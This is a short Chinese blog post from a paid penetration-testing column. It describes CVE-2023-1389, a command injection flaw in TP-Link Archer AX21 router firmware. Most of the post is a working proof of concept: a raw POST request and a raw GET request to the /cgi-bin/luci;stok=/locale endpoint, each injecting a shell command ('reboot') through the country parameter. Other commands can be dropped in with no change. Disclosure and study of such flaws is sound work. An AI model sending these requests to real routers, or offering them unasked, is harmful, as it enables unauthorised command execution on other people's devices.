CVE-2023-1389、TP-Link Archer AX-21 命令注入安全漏洞（/cgi-bin/luci/；stok=/locale?form=country&operation=writ）

墨痕诉清风

于 2024-07-17 15:25:17 发布

阅读量1.4k

点赞数

分类专栏：渗透常识研究文章标签：安全 web安全

本文链接：https://blog.csdn.net/u012206617/article/details/140496334

版权

渗透常识研究专栏收录该内容

214 篇文章 ¥29.90 ¥99.00

订阅专栏

漏洞描述

TP-Link Archer AX-21 命令注入安全漏洞

1.1.4 Build 20230219 之前的 TP-Link Archer AX21 (AX1800) 固件版本存在漏洞

POC

POST

POST /cgi-bin/luci;stok=/locale HTTP/1.1
Host: <Router IP>
Content-Type: application/x-www-form-urlencoded
Content-Length: <Payload Length>
 
token=&addAction=1&country=us;reboot;

GET

GET  /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(reboot;) HTTP/1.1
Host: <Router IP>
Content-Type: application/x-www-form-urlencoded
Content-Length: <Payload Length>